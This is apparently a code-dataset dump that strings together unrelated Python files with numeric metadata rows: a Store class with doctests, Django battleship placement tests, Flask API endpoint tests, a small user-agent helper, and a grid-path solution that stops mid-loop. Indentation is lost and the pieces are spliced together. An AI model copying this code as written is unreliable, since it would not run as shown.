This was suggested by Martijn Pieters (not sure why, again).
The doctests pass, but I don't see a significant or consistent improvement in speed.
self._obj_of_data(self.store.__getitem__(self._id_of_key(k)))
--> self._obj_of_data(self.store[self._id_of_key(k)])
map(self._key_of_id, self.store.__iter__())
--> map(self._key_of_id, iter(self.store))
self.store.__len__()
--> len(self.store)
self.store.__contains__(self._id_of_key(k))
--> self._id_of_key(k) in self.store
self.store.__setitem__(self._id_of_key(k), self._data_of_obj(v))
--> self.store[self._id_of_key(k)] = self._data_of_obj(v)
# Note that there's a difference here, since in the old way, a value COULD be returned (if __setitem__ did)
self.store.__delitem__(self._id_of_key(k))
--> del self.store[self._id_of_key(k)]
# Same comment about no return value for __setitem__
self.store.__repr__()
--> repr(self.store)
>>> Store = StoreLessDunders
>>> # Default store: no key or value conversion ################################################
>>> s = Store()
>>> s['foo'] = 33
>>> s['bar'] = 65
>>> assert list(s.items()) == [('foo', 33), ('bar', 65)]
>>> assert list(s.store.items()) == [('foo', 33), ('bar', 65)] # see that the store contains the same thing
>>>
>>> ################################################################################################
>>> # Now let's make stores that have a key and value conversion layer #############################
>>> # input keys will be upper cased, and output keys lower cased ##################################
>>> # input values (assumed int) will be converted to ascii string, and vice versa #################
>>> ################################################################################################
>>>
>>> def test_store(s):
... s['foo'] = 33 # write 33 to 'foo'
... assert 'foo' in s # __contains__ works
... assert 'no_such_key' not in s # "not in" works
... s['bar'] = 65 # write 65 to 'bar'
... assert len(s) == 2 # there are indeed two elements
... assert list(s) == ['foo', 'bar'] # these are the keys
... assert list(s.keys()) == ['foo', 'bar'] # the keys() method works!
... assert list(s.values()) == [33, 65] # the values() method works!
... assert list(s.items()) == [('foo', 33), ('bar', 65)] # these are the items
... assert list(s.store.items()) == [('FOO', '!'), ('BAR', 'A')] # but note the internal representation
... assert s.get('foo') == 33 # the get method works
... assert s.get('no_such_key', 'something') == 'something' # return a default value
... del(s['foo']) # you can delete an item given its key
... assert len(s) == 1 # see, only one item left!
... assert list(s.items()) == [('bar', 65)] # here it is
>>>
>>> # We can introduce this conversion layer in several ways. Here's a few... ######################
>>> # by subclassing ###############################################################################
>>> class MyStore(Store):
... def _id_of_key(self, k):
... return k.upper()
... def _key_of_id(self, _id):
... return _id.lower()
... def _data_of_obj(self, obj):
... return chr(obj)
... def _obj_of_data(self, data):
... return ord(data)
>>> s = MyStore(store=dict()) # note that you don't need to specify dict(), since it's the default
>>> test_store(s)
>>>
>>> # by assigning functions to converters ##########################################################
>>> class MyStore(Store):
... def __init__(self, store, _id_of_key, _key_of_id, _data_of_obj, _obj_of_data):
... super().__init__(store)
... self._id_of_key = _id_of_key
... self._key_of_id = _key_of_id
... self._data_of_obj = _data_of_obj
... self._obj_of_data = _obj_of_data
...
>>> s = MyStore(dict(),
... _id_of_key=lambda k: k.upper(),
... _key_of_id=lambda _id: _id.lower(),
... _data_of_obj=lambda obj: chr(obj),
... _obj_of_data=lambda data: ord(data))
>>> test_store(s)
>>>
>>> # using a Mixin class #############################################################################
>>> class Mixin:
... def _id_of_key(self, k):
... return k.upper()
... def _key_of_id(self, _id):
... return _id.lower()
... def _data_of_obj(self, obj):
... return chr(obj)
... def _obj_of_data(self, data):
... return ord(data)
...
>>> class MyStore(Mixin, Store): # note that the Mixin must come before Store in the mro
... pass
...
>>> s = MyStore() # no dict()? No, because default anyway
>>> test_store(s)
>>>
>>> # adding wrapper methods to an already made Store instance #########################################
>>> s = Store(dict())
>>> s._id_of_key=lambda k: k.upper()
>>> s._key_of_id=lambda _id: _id.lower()
>>> s._data_of_obj=lambda obj: chr(obj)
>>> s._obj_of_data=lambda data: ord(data)
>>> test_store(s)
"""
# __slots__ = ('_id_of_key', '_key_of_id', '_data_of_obj', '_obj_of_data')
def __init__(self, store=dict):
if isinstance(store, type):
store = store()
self.store = store
_id_of_key = static_identity_method
_key_of_id = static_identity_method
_data_of_obj = static_identity_method
_obj_of_data = static_identity_method
# Read ####################################################################
def __getitem__(self, k: Key) -> Val:
return self._obj_of_data(self.store[self._id_of_key(k)])
def get(self, k: Key, default=None) -> Val:
data = self.store.get(self._id_of_key(k), no_such_item)
if data is not no_such_item:
return self._obj_of_data(data)
else:
return default
# Explore ####################################################################
def __iter__(self) -> KeyIter:
return map(self._key_of_id, iter(self.store))
def __len__(self) -> int:
return len(self.store)
def __contains__(self, k) -> bool:
return self._id_of_key(k) in self.store
def head(self) -> Item:
for k, v in self.items():
return k, v
# Write ####################################################################
def __setitem__(self, k: Key, v: Val):
self.store[self._id_of_key(k)] = self._data_of_obj(v)
# return self.store.__setitem__(self._id_of_key(k), self._data_of_obj(v))
# Delete ####################################################################
def __delitem__(self, k: Key):
del self.store[self._id_of_key(k)]
# return self.store.__delitem__(self._id_of_key(k))
def clear(self):
raise NotImplementedError('''
The clear method was overridden to make dangerous operations difficult.
If you really want to delete all your data, you can do so by doing:
try:
while True:
self.popitem()
except KeyError:
pass''')
# Misc ####################################################################
def __repr__(self):
return repr(self.store)
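The StoreLessDunders docstring claims the builtin-based rewrite shows no significant or consistent speed improvement; a timeit micro-benchmark is one way to check that claim on a given machine. A minimal sketch, assuming Store and StoreLessDunders are importable as defined above; the workload and repetition counts are arbitrary choices, not from the original.

# Micro-benchmark sketch for the "no consistent speed improvement" claim above.
# Assumes Store and StoreLessDunders are importable as defined in this module.
import timeit

def workload(store_cls):
    s = store_cls(dict())
    for i in range(1000):
        s[str(i)] = i          # exercises __setitem__
    return sum(1 for _ in s)   # exercises __iter__

for store_cls in (Store, StoreLessDunders):
    t = timeit.timeit(lambda: workload(store_cls), number=100)
    print(store_cls.__name__, round(t, 3))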
| 43.41716
| 115
| 0.498467
| 1,767
| 14,675
| 3.804188
| 0.127334
| 0.024398
| 0.042696
| 0.036001
| 0.876822
| 0.871169
| 0.871169
| 0.863434
| 0.824755
| 0.824755
| 0
| 0.006327
| 0.246065
| 14,675
| 337
| 116
| 43.545994
| 0.601229
| 0.668211
| 0
| 0.795181
| 0
| 0
| 0.161338
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.26506
| false
| 0.024096
| 0.012048
| 0.144578
| 0.614458
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
998c9a078723d6f5df07e87f8f05a4c12af23898
| 6,238
|
py
|
Python
|
fleets/tests.py
|
elcolie/battleship
|
71b0a963c5b24ae243a193749813fec321d5f4d8
|
[
"MIT"
] | null | null | null |
fleets/tests.py
|
elcolie/battleship
|
71b0a963c5b24ae243a193749813fec321d5f4d8
|
[
"MIT"
] | 3
|
2018-04-22T04:40:25.000Z
|
2020-06-05T19:10:08.000Z
|
fleets/tests.py
|
elcolie/battleship
|
71b0a963c5b24ae243a193749813fec321d5f4d8
|
[
"MIT"
] | null | null | null |
import pytest
from django.conf import settings
from django.db import IntegrityError
from fleets.models import Fleet
from commons.conftest import board
from fleets.utils import add_battleship, OutOceanException, add_submarine, NearShipException
def test_place_battleship_left_top_corner_vertical(board):
add_battleship(board, 1, 1, vertical=True)
assert 4 == Fleet.objects.filter(fleet_type=Fleet.FleetType.battleship, x_axis=1, occupied=True).count()
def test_place_battleship_left_top_corner_horizontal(board):
add_battleship(board, 1, 1, vertical=False)
assert 4 == Fleet.objects.filter(fleet_type=Fleet.FleetType.battleship, y_axis=1, occupied=True).count()
def test_place_battleship_left_bottom_vertical(board):
"""Expect raises an Exception"""
with pytest.raises(OutOceanException):
add_battleship(board, 1, 10, vertical=True)
assert 0 == Fleet.objects.count()
def test_place_battleship_left_bottom_horizontal(board):
add_battleship(board, 1, 10, vertical=False)
assert 4 == Fleet.objects.filter(fleet_type=Fleet.FleetType.battleship, y_axis=10, occupied=True).count()
def test_place_battleship_right_top_vertical(board):
add_battleship(board, 10, 1, vertical=True)
assert 4 == Fleet.objects.filter(fleet_type=Fleet.FleetType.battleship, x_axis=10, occupied=True).count()
def test_place_battleship_at_right_top_horizontal(board):
with pytest.raises(OutOceanException):
add_battleship(board, 10, 1, vertical=False)
assert 0 == Fleet.objects.count()
def test_place_battleship_at_right_bottom_vertical(board):
with pytest.raises(OutOceanException):
add_battleship(board, 10, 10, vertical=True)
assert 0 == Fleet.objects.count()
def test_place_battleship_at_right_bottom_horizontal(board):
with pytest.raises(OutOceanException):
add_battleship(board, 10, 10, vertical=False)
assert 0 == Fleet.objects.count()
def test_place_submarine_left_top_vertical(board):
add_submarine(board, 1, 1, vertical=True)
assert 1 == Fleet.objects.filter(occupied=True).count()
def test_place_submarine_left_top_horizontal(board):
add_submarine(board, 1, 1, vertical=False)
assert 1 == Fleet.objects.filter(occupied=True).count()
def test_place_submarine_right_bottom(board):
add_submarine(board, 1, 1, vertical=False)
assert 1 == Fleet.objects.filter(occupied=True).count()
'''Vertical/Horizontal surrounding'''
def test_submarine_surrounding_vertical_under(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 5, 6, vertical=False)
def test_submarine_surrounding_vertical_upper(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 5, 4, vertical=False)
def test_submarine_surrounding_horizontal_left(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 4, 5, vertical=False)
def test_submarine_surrounding_horizontal_right(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 6, 5, vertical=False)
'''Diagonal surrounding'''
def test_submarine_surrounding_up_left(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 4, 4, vertical=False)
def test_submarine_surrounding_up_right(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 6, 4, vertical=False)
def test_submarine_surrounding_down_left(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 4, 6, vertical=False)
def test_submarine_surrounding_down_right(board):
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 6, 6, vertical=False)
def test_submarine_overlap_battle_ship(board):
"""
X : submarine
Y : battleship
Alignment: XYYYY
:param board:
:return:
"""
add_submarine(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_battleship(board, 5, 6, vertical=False)
def test_battleship_horizontal_then_submarine_top_left(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 4, 4, vertical=False)
def test_battleship_horizontal_then_submarine_top_mid(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 5, 4, vertical=False)
def test_battleship_horizontal_then_submarine_top_right(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 6, 4, vertical=False)
def test_battleship_horizontal_then_submarine_left_mid(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 4, 5, vertical=False)
def test_battleship_horizontal_then_submarine_left_down(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 4, 4, vertical=False)
def test_battleship_horizontal_then_submarine_down_mid(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 5, 4, vertical=False)
def test_battleship_horizontal_then_submarine_down_right(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 5, 6, vertical=False)
def test_battleship_horizontal_then_submarine_right_mid(board):
add_battleship(board, 5, 5, vertical=False)
with pytest.raises(NearShipException):
add_submarine(board, 5 + settings.BATTLESHIP_SIZE, 5, vertical=False)
def test_battleships_cross_each_others_at_mid(board):
add_battleship(board, 5, 5, vertical=False)
# Handle at database layer
with pytest.raises(IntegrityError):
add_battleship(board, 6, 3, vertical=True)
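Taken together, the corner-placement tests pin down the geometry: a ship occupies `size` consecutive cells from (x, y), growing along y when vertical and along x when horizontal, and placement raises OutOceanException if any cell leaves the 10x10 board. A minimal sketch of that rule as the tests encode it; this is an illustration, not the actual fleets.utils implementation (BOARD_SIZE, cells_for, and the ValueError stand-in are introduced here).

# Illustrative sketch only -- not the actual fleets.utils implementation.
BOARD_SIZE = 10

def cells_for(x, y, size, vertical):
    """Cells a ship of `size` would occupy from (x, y); raise if any leave the board."""
    if vertical:
        cells = [(x, y + i) for i in range(size)]
    else:
        cells = [(x + i, y) for i in range(size)]
    if any(not (1 <= cx <= BOARD_SIZE and 1 <= cy <= BOARD_SIZE) for cx, cy in cells):
        raise ValueError('out of ocean')  # stand-in for OutOceanException
    return cells

# Matches the corner tests above: a battleship (size 4) at (1, 10) fits
# horizontally but not vertically; at (10, 1) it fits vertically but not horizontally.
assert cells_for(1, 10, 4, vertical=False) == [(1, 10), (2, 10), (3, 10), (4, 10)]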
| 32.831579
| 109
| 0.756332
| 818
| 6,238
| 5.51467
| 0.095355
| 0.118156
| 0.10552
| 0.059854
| 0.873199
| 0.842607
| 0.819996
| 0.733319
| 0.733319
| 0.688982
| 0
| 0.022301
| 0.144598
| 6,238
| 189
| 110
| 33.005291
| 0.823088
| 0.019397
| 0
| 0.521739
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095652
| 1
| 0.252174
| false
| 0
| 0.052174
| 0
| 0.304348
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41d7ce148bc066173427996271d6d830ef33de3c
| 14,676
|
py
|
Python
|
tests/test_crest_endpoint.py
|
EVEprosper/ProsperAPI
|
2d25b9210d32ca777204b1dddb56848d7075dd85
|
[
"MIT"
] | 13
|
2017-03-27T13:10:52.000Z
|
2020-07-30T09:33:11.000Z
|
tests/test_crest_endpoint.py
|
EVEprosper/ProsperAPI
|
2d25b9210d32ca777204b1dddb56848d7075dd85
|
[
"MIT"
] | 19
|
2016-11-14T00:58:54.000Z
|
2018-06-11T16:54:25.000Z
|
tests/test_crest_endpoint.py
|
EVEprosper/ProsperAPI
|
2d25b9210d32ca777204b1dddb56848d7075dd85
|
[
"MIT"
] | 5
|
2017-04-19T01:12:06.000Z
|
2021-03-07T02:23:45.000Z
|
from os import path, listdir, remove
import platform
import io
from datetime import datetime, timedelta
import time
import json
import pandas as pd
from tinymongo import TinyMongoClient
import pytest
from flask import url_for
import publicAPI.exceptions as exceptions
import publicAPI.config as api_utils
import helpers
HERE = path.abspath(path.dirname(__file__))
ROOT = path.dirname(HERE)
CONFIG_FILENAME = path.join(HERE, 'test_config.cfg')
CONFIG = helpers.get_config(CONFIG_FILENAME)
ROOT_CONFIG = helpers.get_config(
path.join(ROOT, 'scripts', 'app.cfg')
)
TEST_CACHE_PATH = path.join(HERE, 'cache')
CACHE_PATH = path.join(ROOT, 'publicAPI', 'cache')
BASE_URL = 'http://localhost:8000'
def test_clear_caches():
"""remove cache files for test"""
helpers.clear_caches(True)
VIRGIN_RUNTIME = None
@pytest.mark.usefixtures('client_class')
class TestODBCcsv:
"""test framework for collecting endpoint stats"""
def test_odbc_happypath(self):
"""exercise `collect_stats`"""
global VIRGIN_RUNTIME
fetch_start = time.time()
req = self.client.get(
url_for('ohlc_endpoint', return_type='csv') +
'?typeID={type_id}&regionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id')
)
)
fetch_end = time.time()
VIRGIN_RUNTIME = fetch_end - fetch_start
print(req.__dict__)
data = None
with io.StringIO(req.data.decode()) as buff:
data = pd.read_csv(buff)
assert req._status_code == 200
expected_headers = [
'date',
'open',
'high',
'low',
'close',
'volume'
]
assert set(expected_headers) == set(data.columns.values)
def test_odbc_happypath_cached(self):
"""rerun test with cached values"""
fetch_start = time.time()
req = self.client.get(
url_for('ohlc_endpoint', return_type='csv') +
'?typeID={type_id}&regionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id')
)
)
fetch_end = time.time()
runtime = fetch_end - fetch_start
if runtime > VIRGIN_RUNTIME/1.5:
pytest.xfail('cached performance slower than expected')
def test_odbc_bad_typeid(self):
"""make sure expected errors happen on bad typeid"""
req = self.client.get(
url_for('ohlc_endpoint', return_type='csv') +
'?typeID={type_id}&regionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'bad_typeid'),
region_id=CONFIG.get('TEST', 'region_id')
)
)
assert req._status_code == 404
def test_odbc_bad_regionid(self):
"""make sure expected errors happen on bad typeid"""
req = self.client.get(
url_for('ohlc_endpoint', return_type='csv') +
'?typeID={type_id}&regionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'bad_regionid')
)
)
assert req._status_code == 404
def test_odbc_bad_format(self):
"""make sure expected errors happen on bad typeid"""
req = self.client.get(
url_for('ohlc_endpoint', return_type='butts') +
'?typeID={type_id}&regionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id')
)
)
assert req._status_code == 405
@pytest.mark.usefixtures('client_class')
class TestODBCjson:
"""test framework for collecting endpoint stats"""
def test_odbc_happypath(self):
"""exercise `collect_stats`"""
test_clear_caches()
global VIRGIN_RUNTIME
fetch_start = time.time()
req = self.client.get(
url_for('ohlc_endpoint', return_type='json') +
'?typeID={type_id}&regionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id')
)
)
fetch_end = time.time()
VIRGIN_RUNTIME = fetch_end - fetch_start
raw_data = json.loads(req.data.decode())
data = pd.DataFrame(raw_data)
assert req._status_code == 200
expected_headers = [
'date',
'open',
'high',
'low',
'close',
'volume'
]
assert set(expected_headers) == set(data.columns.values)
def test_odbc_bad_typeid(self):
"""make sure expected errors happen on bad typeid"""
req = self.client.get(
url_for('ohlc_endpoint', return_type='json') +
'?typeID={type_id}&regionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'bad_typeid'),
region_id=CONFIG.get('TEST', 'region_id')
)
)
assert req._status_code == 404
def test_odbc_bad_regionid(self):
"""make sure expected errors happen on bad typeid"""
req = self.client.get(
url_for('ohlc_endpoint', return_type='json') +
'?typeID={type_id}&regionID={region_id}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'bad_regionid')
)
)
assert req._status_code == 404
TEST_API_KEY = ''
def test_get_api_key():
"""fetch api key from cache for testing"""
global TEST_API_KEY
connection = TinyMongoClient(CACHE_PATH)
api_db = connection.prosperAPI.users
vals = api_db.find_one()  # find() returns a cursor; a single document is needed here
if not vals:
pytest.xfail('Unable to test without test keys')
test_key = vals['api_key']
connection.close()
TEST_API_KEY = test_key
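# Hedged note: TinyMongoClient persists its collections as JSON files under
# CACHE_PATH, so a throwaway key could be seeded for local runs roughly like
# the illustrative, commented-out snippet below.
# seed = TinyMongoClient(CACHE_PATH)
# seed.prosperAPI.users.insert_one({'api_key': 'LOCAL-TEST-KEY'})
# seed.close()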
@pytest.mark.prophet
@pytest.mark.usefixtures('client_class')
class TestProphetcsv:
"""test framework for collecting endpoint stats"""
def test_prophet_happypath(self):
"""exercise `collect_stats`"""
test_clear_caches()
assert TEST_API_KEY != ''
global VIRGIN_RUNTIME
fetch_start = time.time()
req = self.client.get(
url_for('prophetendpoint', return_type='csv') +
'?typeID={type_id}&regionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
fetch_end = time.time()
VIRGIN_RUNTIME = fetch_end - fetch_start
data = None
with io.StringIO(req.data.decode()) as buff:
data = pd.read_csv(buff)
assert req._status_code == 200
expected_headers = [
'date',
'avgPrice',
'yhat',
'yhat_low',
'yhat_high',
'prediction'
]
assert set(expected_headers) == set(data.columns.values)
##TODO: validate ranges?
def test_prophet_happypath_cached(self):
"""exercise `collect_stats`"""
fetch_start = time.time()
req = self.client.get(
url_for('prophetendpoint', return_type='csv') +
'?typeID={type_id}&regionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
fetch_end = time.time()
runtime = fetch_end - fetch_start
if runtime > VIRGIN_RUNTIME/1.5:
pytest.xfail('cached performance slower than expected')
def test_prophet_bad_regionid(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='csv') +
'?typeID={type_id}&regionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'bad_regionid'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
assert req._status_code == 404
def test_prophet_bad_typeid(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='csv') +
'?typeID={type_id}&regionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'bad_typeid'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
assert req._status_code == 404
def test_prophet_bad_api(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='csv') +
'?typeID={type_id}&regionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key='IMAHUGEBUTT',
range=CONFIG.get('TEST', 'forecast_range')
)
)
assert req._status_code == 401
def test_prophet_bad_range(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='csv') +
'?typeID={type_id}&regionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=9001
)
)
assert req._status_code == 413
def test_prophet_bad_format(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='butts') +
'?typeID={type_id}&regionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
assert req._status_code == 405
@pytest.mark.prophet
@pytest.mark.usefixtures('client_class')
class TestProphetjson:
"""test framework for collecting endpoint stats"""
def test_prophet_happypath(self):
"""exercise `collect_stats`"""
test_clear_caches()
global VIRGIN_RUNTIME
fetch_start = time.time()
req = self.client.get(
url_for('prophetendpoint', return_type='json') +
'?typeID={type_id}&regionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
fetch_end = time.time()
VIRGIN_RUNTIME = fetch_end - fetch_start
raw_data = json.loads(req.data.decode())
data = pd.DataFrame(raw_data)
assert req._status_code == 200
expected_headers = [
'date',
'avgPrice',
'yhat',
'yhat_low',
'yhat_high',
'prediction'
]
assert set(expected_headers) == set(data.columns.values)
##TODO: validate ranges?
def test_prophet_happypath_cached(self):
"""exercise `collect_stats`"""
fetch_start = time.time()
req = self.client.get(
url_for('prophetendpoint', return_type='json') +
'?typeID={type_id}&regionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
fetch_end = time.time()
runtime = fetch_end - fetch_start
if runtime > VIRGIN_RUNTIME/1.5:
pytest.xfail('cached performance slower than expected')
def test_prophet_bad_regionid(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='json') +
'?typeID={type_id}&regionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'bad_regionid'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
assert req._status_code == 404
def test_prophet_bad_typeid(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='json') +
'?typeID={type_id}&regionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'bad_typeid'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=CONFIG.get('TEST', 'forecast_range')
)
)
assert req._status_code == 404
def test_prophet_bad_api(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='json') +
'?typeID={type_id}&regionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key='IMAHUGEBUTT',
range=CONFIG.get('TEST', 'forecast_range')
)
)
assert req._status_code == 401
def test_prophet_bad_range(self):
"""exercise `collect_stats`"""
req = self.client.get(
url_for('prophetendpoint', return_type='json') +
'?typeID={type_id}&regionID={region_id}&api={api_key}&range={range}'.format(
type_id=CONFIG.get('TEST', 'nosplit_id'),
region_id=CONFIG.get('TEST', 'region_id'),
api_key=TEST_API_KEY,
range=9000
)
)
assert req._status_code == 413
| 35.535109
| 88
| 0.570796
| 1,677
| 14,676
| 4.725104
| 0.093023
| 0.059566
| 0.086951
| 0.079505
| 0.871277
| 0.865724
| 0.857648
| 0.855628
| 0.855628
| 0.83897
| 0
| 0.006975
| 0.296675
| 14,676
| 412
| 89
| 35.621359
| 0.760705
| 0.063301
| 0
| 0.718475
| 0
| 0
| 0.201867
| 0.085391
| 0
| 0
| 0
| 0.002427
| 0.067449
| 1
| 0.067449
| false
| 0
| 0.038123
| 0
| 0.117302
| 0.002933
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41e7a7002edbf0ef23115a82d956ae1a5208a6c5
| 110
|
py
|
Python
|
zmon_agent/common.py
|
linki/zmon-agent-core
|
f8f2ced79c05705fa1062b577687e4f60ae0872a
|
[
"MIT"
] | 1
|
2019-01-19T15:04:04.000Z
|
2019-01-19T15:04:04.000Z
|
zmon_agent/common.py
|
linki/zmon-agent-core
|
f8f2ced79c05705fa1062b577687e4f60ae0872a
|
[
"MIT"
] | 116
|
2016-12-06T12:54:31.000Z
|
2020-03-10T09:43:26.000Z
|
zmon_agent/common.py
|
linki/zmon-agent-core
|
f8f2ced79c05705fa1062b577687e4f60ae0872a
|
[
"MIT"
] | 12
|
2017-02-16T21:40:56.000Z
|
2020-01-13T17:06:38.000Z
|
from zmon_agent import __version__
def get_user_agent():
return 'zmon-k8s-agent/{}'.format(__version__)
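# e.g. get_user_agent() -> 'zmon-k8s-agent/1.2.3' (version string is illustrative)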
| 18.333333
| 50
| 0.754545
| 15
| 110
| 4.8
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010417
| 0.127273
| 110
| 5
| 51
| 22
| 0.739583
| 0
| 0
| 0
| 0
| 0
| 0.154545
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
510ce0676e3a9c44356d6099b0b7320a4ce8dda5
| 2,028
|
py
|
Python
|
BOJ/17000~17999/17200~17299/17265.py
|
shinkeonkim/today-ps
|
f3e5e38c5215f19579bb0422f303a9c18c626afa
|
[
"Apache-2.0"
] | 2
|
2020-01-29T06:54:41.000Z
|
2021-11-07T13:23:27.000Z
|
BOJ/17000~17999/17200~17299/17265.py
|
shinkeonkim/Today_PS
|
bb0cda0ee1b9c57e1cfa38355e29d0f1c6167a44
|
[
"Apache-2.0"
] | null | null | null |
BOJ/17000~17999/17200~17299/17265.py
|
shinkeonkim/Today_PS
|
bb0cda0ee1b9c57e1cfa38355e29d0f1c6167a44
|
[
"Apache-2.0"
] | null | null | null |
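# BOJ 17265: numbers occupy the grid cells with (i + j) even and the operators
# '+', '-', '*' the odd cells; D tracks the maximum and D2 the minimum value
# reachable by any monotone (right/down/diagonal) path expression.
# Hedged sanity check (illustrative, not an official sample): for n = 1 and a
# single cell "7", none of the loops run and the program prints "7 7".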
def f(a,b,cc):
if cc == '+':
return a+b
if cc == '-':
return a-b
if cc == '*':
return a*b
n=int(input())
L=[]
for i in range(n):
a=input()
L.append(a.split())
D = [[-987654321]*(n) for i in range(n)]
D2 = [[987654321]*(n) for i in range(n)]
for i in range(n):
if i%2 == 0:
for j in range(0,n,2):
L[i][j] = int(L[i][j])
else:
